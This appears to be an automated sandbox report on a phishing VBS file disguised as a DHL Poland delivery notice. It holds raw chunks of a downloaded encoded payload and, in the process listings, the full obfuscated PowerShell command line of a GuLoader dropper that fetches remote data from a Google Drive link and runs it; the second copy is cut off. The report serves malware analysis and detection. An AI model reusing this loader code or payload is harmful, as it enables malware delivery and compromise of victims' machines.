            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 437716
            Last-Modified: Tue, 02 Jul 2024 09:26:33 GMT
            X-GUploader-UploadID: ACJd0NraQgWBJ9mZilfxsIO-BEr1wuLiB_ojXTQgPzqTU6DuFdPiStEvdjBZyRSnFtFZBY9d1rxiynwp2Q
            Date: Wed, 03 Jul 2024 06:52:18 GMT
            Expires: Wed, 03 Jul 2024 06:52:18 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=foKCBQ==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-07-03 06:52:18 UTC4828INData Raw: 36 77 4c 61 4c 4f 73 43 35 46 6d 37 64 5a 55 51 41 48 45 42 6d 2b 73 43 72 51 4d 44 58 43 51 45 36 77 4c 56 4b 6e 45 42 6d 37 6d 50 6c 6c 47 69 36 77 4c 38 45 58 45 42 6d 34 48 42 6a 7a 32 77 2f 2b 73 43 4a 6d 74 78 41 5a 75 42 38 52 37 55 41 61 4a 78 41 5a 76 72 41 73 77 63 36 77 49 58 30 65 73 43 48 34 57 36 34 6f 2f 69 2f 4f 73 43 74 70 7a 72 41 6d 36 43 63 51 47 62 63 51 47 62 4d 63 72 72 41 6c 30 39 36 77 49 51 6a 34 6b 55 43 33 45 42 6d 2b 73 43 43 67 72 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 52 71 46 78 41 5a 75 42 2b 55 76 4e 52 41 46 38 7a 48 45 42 6d 33 45 42 6d 34 74 45 4a 41 54 72 41 68 70 55 63 51 47 62 69 63 50 72 41 73 70 62 63 51 47 62 67 63 4d 58 30 68 38 42 36 77 4b 6f 2f 58 45 42 6d 37 72 45 70 33 46 63 63 51 47 62 36 77 4a
            Data Ascii: 6wLaLOsC5Fm7dZUQAHEBm+sCrQMDXCQE6wLVKnEBm7mPllGi6wL8EXEBm4HBjz2w/+sCJmtxAZuB8R7UAaJxAZvrAswc6wIX0esCH4W64o/i/OsCtpzrAm6CcQGbcQGbMcrrAl096wIQj4kUC3EBm+sCCgrR4nEBm3EBm4PBBOsCRqFxAZuB+UvNRAF8zHEBm3EBm4tEJATrAhpUcQGbicPrAspbcQGbgcMX0h8B6wKo/XEBm7rEp3FccQGb6wJ
            2024-07-03 06:52:18 UTC4828INData Raw: 73 30 38 31 56 79 63 37 78 48 48 59 32 44 35 62 76 6e 32 74 6f 54 32 44 6d 75 49 6f 76 4e 6d 50 47 69 36 68 6d 66 6c 79 44 47 75 50 72 56 4c 37 6c 53 65 4e 66 57 65 72 7a 73 39 67 55 67 69 55 63 31 30 4a 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6d 4e 35 6e 53 64 56 7a 62 44 6d 67 4a 49 6e 6f 68 75 33 62 57 70 51 72 7a 79 4a 4a 61 71 73 4e 45 4f 6d 73 4b 6f 56 42 61 58 6f 38 68 57 77 62 61 67 6d 7a 65 30 58 43 67 5a 57 6b 32 6d 50 58 4e 77 4e 67 5a 6f 2f 44 6e 51 78 6d 6a 47 58 50 6c 30 4a 70 54 35 64 43 61 55 2b 58 51 6d 6c 42 2b 34 77 61 48 72 63 6f 4c 31 62 70 4d 6a 54 62 6c 46 41 5a 65 61 76 44 38 32 38 42 39 30 34 38 4f 78 6f 55 61 39 77 56 4e 35 2b 33 44 32 42 72 65 6d 47 2f 72 39 70 4c 56 5a 4a 34 32 46 70 35 4c 2b 69 69 74 71 63 30 61 68 42 70 76 31
            Data Ascii: s081Vyc7xHHY2D5bvn2toT2DmuIovNmPGi6hmflyDGuPrVL7lSeNfWerzs9gUgiUc10JpT5dCaU+XQmlPmN5nSdVzbDmgJInohu3bWpQrzyJJaqsNEOmsKoVBaXo8hWwbagmze0XCgZWk2mPXNwNgZo/DnQxmjGXPl0JpT5dCaU+XQmlB+4waHrcoL1bpMjTblFAZeavD828B9048OxoUa9wVN5+3D2BremG/r9pLVZJ42Fp5L+iitqc0ahBpv1
            2024-07-03 06:52:18 UTC214INData Raw: 77 2b 6c 56 70 45 2f 4a 45 37 39 78 4c 65 76 34 6e 65 74 57 4d 5a 6f 35 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6c 30 4a 6a 55 6f 4e 68 39 53 6e 69 66 77 30 63 68 72 31 31 6d 2f 4a 52 56 71 4c 48 51 69 6c 50 72 58 39 31 44 70 64 58 68 72 2f 31 4b 62 2f 76 36 70 4f 4a 50 2f 55 69 45 6f 47 46 31 43 78 76 37 4a 48 47 43 72 69 57 7a 6d 33 76 77 43 66 6f 39 6a 5a 30 7a 44 71 78 44 78 42 45 72 6d 7a 6f 35 6c 51 38 74 5a 33 43 4c 6a 2f 5a 56 6f 43 76 71 64 33 2f 37 75 48 56 69 35 35 57 51 5a 69 41 4d 38 4a 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6c 30 66 45 32 73 52 63 35 46 4f 6c 2b 78 35 36 75 76 78 49 4c 66 59 5a 61 51 2b 58 59 41 51 6c 46
            Data Ascii: w+lVpE/JE79xLev4netWMZo5pT5dCaU+XQmlPl0JjUoNh9Snifw0chr11m/JRVqLHQilPrX91DpdXhr/1Kb/v6pOJP/UiEoGF1Cxv7JHGCriWzm3vwCfo9jZ0zDqxDxBErmzo5lQ8tZ3CLj/ZVoCvqd3/7uHVi55WQZiAM8JpT5dCaU+XQmlPl0fE2sRc5FOl+x56uvxILfYZaQ+XYAQlF
            2024-07-03 06:52:18 UTC1322INData Raw: 77 4a 70 59 44 62 61 35 5a 4b 44 4c 42 6a 74 66 36 38 4a 4d 2b 6c 32 32 33 33 33 4d 69 49 52 4d 69 4b 4c 41 2f 51 59 68 33 39 7a 72 4a 6a 6f 6f 49 46 2b 4e 58 4c 58 70 32 42 46 74 51 45 6a 78 71 56 42 31 4b 33 75 43 6a 64 51 4b 42 78 49 79 54 65 34 4c 35 4c 79 49 4e 52 54 37 43 78 4f 37 66 45 2f 4c 2b 72 72 44 64 61 4a 67 61 6b 7a 66 63 4a 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6c 30 77 4f 6d 52 56 78 66 75 69 31 48 77 73 78 68 4d 6c 37 4a 6c 4d 2b 74 51 30 72 52 36 69 73 4b 64 32 2f 4b 4a 35 44 32 35 37 76 78 58 79 67 52 36 68 4b 59 2f 63 2f 6e 78 55 72 54 41 6b 79 62 4e 38 36 79 66 63 2f 6a 69 42 58 4b 41 6b 30 62 51 4f 6c 67 59 4e 6c 53 7a 65 56 44 45 34 75 34 52 35 70 6d 52 6d 53 59 51 31 73 48 70 42 76 77 34 70 35 61 33 51 46 33 72 51 53 58 72 48 76
            Data Ascii: wJpYDba5ZKDLBjtf68JM+l22333MiIRMiKLA/QYh39zrJjooIF+NXLXp2BFtQEjxqVB1K3uCjdQKBxIyTe4L5LyINRT7CxO7fE/L+rrDdaJgakzfcJpT5dCaU+XQmlPl0wOmRVxfui1HwsxhMl7JlM+tQ0rR6isKd2/KJ5D257vxXygR6hKY/c/nxUrTAkybN86yfc/jiBXKAk0bQOlgYNlSzeVDE4u4R5pmRmSYQ1sHpBvw4p5a3QF3rQSXrHv
            2024-07-03 06:52:18 UTC1390INData Raw: 41 67 54 4c 41 76 61 71 54 31 67 41 58 5a 5a 6c 51 33 69 72 49 67 45 4c 74 55 44 4e 70 48 51 34 56 54 75 4e 7a 59 6b 38 6d 50 4d 6a 65 39 67 43 36 4e 48 46 57 4b 72 4f 65 4a 30 45 69 42 69 53 58 51 6d 6c 33 56 30 4a 70 54 48 5a 76 79 6b 2b 58 56 59 75 65 56 46 5a 48 63 76 4b 37 6a 55 4c 53 6e 67 6c 41 6c 67 4e 5a 61 59 4f 67 4c 58 70 41 32 54 66 55 4e 36 30 37 66 64 37 42 6e 68 35 74 79 33 63 52 50 74 57 6a 4c 33 54 4d 5a 5a 47 51 36 39 33 66 45 66 61 46 4c 61 72 4a 6b 6d 36 41 55 65 30 74 64 42 52 4c 4c 73 74 43 4b 55 2b 6b 61 38 5a 47 6a 65 6b 71 6d 36 58 67 66 58 56 4e 6a 71 4f 2f 33 50 56 4c 51 2f 69 6d 44 62 47 67 62 6e 6f 58 51 79 6b 4e 79 6f 62 59 4b 34 65 51 53 55 75 65 78 6e 46 56 6e 49 69 69 77 72 50 59 63 4f 67 47 55 2b 4d 48 48 69 4f 49 38 69
            Data Ascii: AgTLAvaqT1gAXZZlQ3irIgELtUDNpHQ4VTuNzYk8mPMje9gC6NHFWKrOeJ0EiBiSXQml3V0JpTHZvyk+XVYueVFZHcvK7jULSnglAlgNZaYOgLXpA2TfUN607fd7Bnh5ty3cRPtWjL3TMZZGQ693fEfaFLarJkm6AUe0tdBRLLstCKU+ka8ZGjekqm6XgfXVNjqO/3PVLQ/imDbGgbnoXQykNyobYK4eQSUuexnFVnIiiwrPYcOgGU+MHHiOI8i
            2024-07-03 06:52:18 UTC1390INData Raw: 6f 75 69 6d 59 6b 2b 59 76 4b 4c 47 4c 55 44 6b 71 59 6b 43 42 48 33 47 69 66 66 66 49 49 5a 6f 46 4b 65 37 4d 52 42 66 42 30 36 4f 70 6e 34 42 31 74 79 77 54 30 69 2b 41 4c 50 45 37 33 4d 4f 73 48 63 45 78 78 34 44 75 64 2b 6f 51 4b 49 38 44 4f 33 4f 50 31 44 56 72 2b 4a 4d 7a 2f 55 6f 6c 43 44 62 45 62 51 43 6f 2f 6f 44 73 6e 45 36 73 4c 63 4b 31 38 73 32 6a 39 6c 4f 6b 58 44 49 4e 4a 50 48 55 73 4a 74 45 57 34 30 61 65 65 5a 71 6c 6a 59 52 63 38 71 77 74 74 61 6e 51 68 39 38 33 47 31 37 39 76 37 65 73 43 55 2f 59 58 68 70 48 46 44 61 39 76 37 4a 4c 56 4b 69 4d 69 46 4a 4f 73 47 78 35 76 36 72 61 34 75 53 33 69 46 4b 30 33 52 37 56 74 32 6f 36 76 37 68 6d 76 46 52 37 6e 61 78 54 47 46 72 47 63 43 72 4e 54 5a 62 52 30 57 67 74 52 72 49 2b 67 57 45 4e 73
            Data Ascii: ouimYk+YvKLGLUDkqYkCBH3GifffIIZoFKe7MRBfB06Opn4B1tywT0i+ALPE73MOsHcExx4Dud+oQKI8DO3OP1DVr+JMz/UolCDbEbQCo/oDsnE6sLcK18s2j9lOkXDINJPHUsJtEW40aeeZqljYRc8qwttanQh983G179v7esCU/YXhpHFDa9v7JLVKiMiFJOsGx5v6ra4uS3iFK03R7Vt2o6v7hmvFR7naxTGFrGcCrNTZbR0WgtRrI+gWENs
            2024-07-03 06:52:18 UTC1390INData Raw: 58 77 4f 53 75 32 31 36 51 71 32 7a 39 4a 4c 70 4c 46 37 4d 2b 37 50 64 2f 67 73 47 72 5a 30 45 77 76 4f 53 62 56 75 30 74 37 58 77 68 35 75 38 6b 43 38 2f 77 54 51 73 71 79 6b 4c 70 54 34 4f 73 6f 50 35 33 32 63 6b 7a 51 6c 63 36 67 62 63 2b 71 58 6a 6b 46 38 73 4a 62 32 73 35 65 39 43 4a 77 4a 5a 72 6f 41 42 4c 74 6f 4d 6e 51 35 49 53 7a 49 75 57 41 36 36 75 65 49 45 4b 7a 6f 57 6d 2f 64 49 32 72 73 31 37 51 35 75 30 45 43 48 59 58 36 76 6b 4e 50 2b 74 37 39 62 4c 71 73 70 43 36 55 2b 43 37 64 62 6e 61 4d 64 4a 4e 41 36 4a 71 77 46 33 50 2f 35 4d 6b 53 2b 4a 4d 69 57 63 45 6c 51 43 70 55 73 32 56 77 2b 4f 41 65 4c 65 36 2b 2f 68 74 59 6a 42 31 49 42 6a 38 69 56 76 67 76 79 49 78 59 4d 4a 75 77 71 2f 54 76 63 64 4e 57 69 6d 41 6d 6c 4d 64 49 34 77 7a 70
            Data Ascii: XwOSu216Qq2z9JLpLF7M+7Pd/gsGrZ0EwvOSbVu0t7Xwh5u8kC8/wTQsqykLpT4OsoP532ckzQlc6gbc+qXjkF8sJb2s5e9CJwJZroABLtoMnQ5ISzIuWA66ueIEKzoWm/dI2rs17Q5u0ECHYX6vkNP+t79bLqspC6U+C7dbnaMdJNA6JqwF3P/5MkS+JMiWcElQCpUs2Vw+OAeLe6+/htYjB1IBj8iVvgvyIxYMJuwq/TvcdNWimAmlMdI4wzp
            2024-07-03 06:52:18 UTC1390INData Raw: 4e 41 37 2f 4b 69 31 4f 36 73 4f 63 43 4d 66 30 74 54 65 56 57 45 55 47 67 44 2b 34 6f 7a 55 75 71 39 78 6d 77 65 78 36 71 4d 6e 76 52 48 4e 56 72 50 66 43 57 59 72 56 50 54 75 69 73 57 73 59 6a 62 52 46 58 49 6e 79 6a 36 75 34 31 52 54 61 61 6d 39 6c 71 31 45 53 32 74 74 56 78 4a 4c 44 38 50 73 2b 58 69 62 64 55 6b 2f 4f 37 48 4a 39 54 63 79 30 63 39 4b 45 55 6b 31 50 51 51 74 67 7a 63 2b 34 58 75 53 4f 67 73 4e 41 72 64 2f 42 52 46 4f 31 6a 31 42 72 4d 4e 2b 6d 36 70 68 2b 64 62 34 4e 63 45 78 2b 39 6e 51 77 74 36 61 52 2b 36 43 73 6e 30 57 65 35 50 50 79 51 67 47 59 45 48 73 52 47 37 46 77 6e 44 4d 5a 6f 34 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6c 30 4a 75 7a 74 51 75 79 48 49 57 45 74 78 42 33 55 38 4c 38 45 57 6d 2f 65 45 78 51 73 71 71 64 7a 37 56
            Data Ascii: NA7/Ki1O6sOcCMf0tTeVWEUGgD+4ozUuq9xmwex6qMnvRHNVrPfCWYrVPTuisWsYjbRFXInyj6u41RTaam9lq1ES2ttVxJLD8Ps+XibdUk/O7HJ9Tcy0c9KEUk1PQQtgzc+4XuSOgsNArd/BRFO1j1BrMN+m6ph+db4NcEx+9nQwt6aR+6Csn0We5PPyQgGYEHsRG7FwnDMZo4pT5dCaU+XQmlPl0JuztQuyHIWEtxB3U8L8EWm/eExQsqqdz7V
            2024-07-03 06:52:18 UTC1390INData Raw: 56 55 56 54 75 57 73 32 33 48 54 56 63 57 55 4a 70 54 48 51 73 50 73 36 58 56 59 68 77 41 57 41 45 43 4a 66 43 61 56 6f 34 36 2f 43 4a 4e 79 49 55 36 62 63 49 6f 75 2f 73 7a 64 41 44 2f 4a 62 4f 62 65 2f 43 4a 65 6a 5a 63 50 53 4f 50 73 2b 31 36 74 76 7a 47 69 69 54 41 32 56 51 6e 58 32 69 42 6c 55 6e 2f 78 31 4d 4b 66 66 50 46 2b 7a 7a 68 6e 5a 4e 4c 53 79 38 31 63 6c 62 65 59 34 4c 77 68 53 69 46 37 4a 58 51 6d 6c 4d 64 50 39 2b 54 70 64 55 76 39 76 35 47 4b 47 53 33 32 4b 58 48 39 53 6a 55 5a 69 57 51 6e 38 59 4f 4e 77 4e 35 4b 50 2b 71 72 35 61 77 6d 6c 50 6c 30 4a 70 54 35 64 43 61 55 2b 58 54 65 4f 35 73 31 6b 68 51 4c 47 69 74 78 63 51 67 38 39 34 34 55 66 65 4f 42 45 65 57 6e 77 4a 77 42 39 73 33 4f 36 49 51 47 35 39 30 2f 52 54 70 6d 57 76 36 73
            Data Ascii: VUVTuWs23HTVcWUJpTHQsPs6XVYhwAWAECJfCaVo46/CJNyIU6bcIou/szdAD/JbObe/CJejZcPSOPs+16tvzGiiTA2VQnX2iBlUn/x1MKffPF+zzhnZNLSy81clbeY4LwhSiF7JXQmlMdP9+TpdUv9v5GKGS32KXH9SjUZiWQn8YONwN5KP+qr5awmlPl0JpT5dCaU+XTeO5s1khQLGitxcQg8944UfeOBEeWnwJwB9s3O6IQG590/RTpmWv6s
            2024-07-03 06:52:18 UTC1390INData Raw: 7a 55 4a 4d 67 6d 50 50 6f 75 43 37 65 2b 4f 2b 38 43 4a 4d 69 69 6c 6f 47 71 33 4d 38 41 67 50 51 35 4a 4d 6a 32 6d 51 4a 50 33 4f 66 48 41 72 71 6f 4c 41 44 39 30 48 42 6d 77 50 73 49 6c 32 45 42 63 44 4e 38 77 70 34 2b 37 43 69 73 79 58 62 45 71 6e 4d 52 33 43 43 32 58 49 51 61 6b 55 76 4f 50 65 48 31 6c 6d 65 59 57 62 70 4e 5a 6b 46 54 73 42 39 45 56 79 54 51 58 52 6d 6c 50 74 53 63 75 7a 78 64 43 52 38 51 46 32 2b 78 38 6c 68 44 51 70 6f 39 30 65 6a 74 46 79 7a 79 4e 7a 2f 51 4b 42 63 71 75 39 7a 32 79 78 36 4c 71 66 4c 2b 6e 48 55 79 4b 32 73 41 44 37 4d 57 75 6e 6a 4b 4a 50 78 7a 2b 6d 55 5a 33 50 75 75 33 64 6c 62 4a 4d 78 66 52 48 33 36 33 50 74 4e 35 75 64 31 38 36 4c 55 37 36 51 6f 77 47 2b 63 78 53 63 64 62 54 35 47 6a 64 72 2f 71 54 37 5a 55
            Data Ascii: zUJMgmPPouC7e+O+8CJMiiloGq3M8AgPQ5JMj2mQJP3OfHArqoLAD90HBmwPsIl2EBcDN8wp4+7CisyXbEqnMR3CC2XIQakUvOPeH1lmeYWbpNZkFTsB9EVyTQXRmlPtScuzxdCR8QF2+x8lhDQpo90ejtFyzyNz/QKBcqu9z2yx6LqfL+nHUyK2sAD7MWunjKJPxz+mUZ3Puu3dlbJMxfRH363PtN5ud186LU76QowG+cxScdbT5Gjdr/qT7ZU


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:02:50:16
            Start date:03/07/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
            Imagebase:0x7ff7b1da0000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:02:52:13
            Start date:03/07/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            General

            Target ID:6
            Start time:02:52:13
            Start date:03/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:7
            Start time:02:52:15
            Start date:03/07/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Imagebase:0x7ff7548f0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:02:52:23
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod 